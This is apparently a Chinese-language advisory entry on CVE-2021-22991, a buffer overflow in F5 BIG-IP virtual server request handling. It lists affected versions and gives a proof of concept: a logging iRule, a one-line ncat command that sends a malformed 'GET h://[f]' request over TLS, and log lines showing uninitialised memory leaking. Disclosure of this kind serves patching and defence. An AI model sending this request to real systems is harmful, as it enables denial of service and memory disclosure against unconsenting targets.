BIG-IP 缓冲区溢出漏洞 (CVE-2021-22991)¶

系统可能会错误地处理对虚拟服务器的请求，触发缓冲区溢出，从而导致DoS攻击。理论上可以绕过基于URL的访问控制或远程代码执行（RCE）。

影响版本：

BIG-IP (All Modules)：

16.0.0-16.0.1
15.1.0-15.1.2
14.1.0-14.1.3.1
13.1.0-13.1.3.5
12.1.0-12.1.5.2

PoC：

iRule：

when HTTP_REQUEST { 
log local0. \"normalized: [HTTP::uri -normalized]\" 
log local0. \"uri: [HTTP::uri]\" }

请求：

echo -e \"GET h://[f] HTTP/1.1\\
\\
\" | ncat --ssl 10.154.0.3 443

未初始化的内存直接记录到 /var/log/ltm:

Dec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: normalized: h://[aa:cf01::c00:0:1100:0]/ 
Dec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: uri: h://[aa]

ref: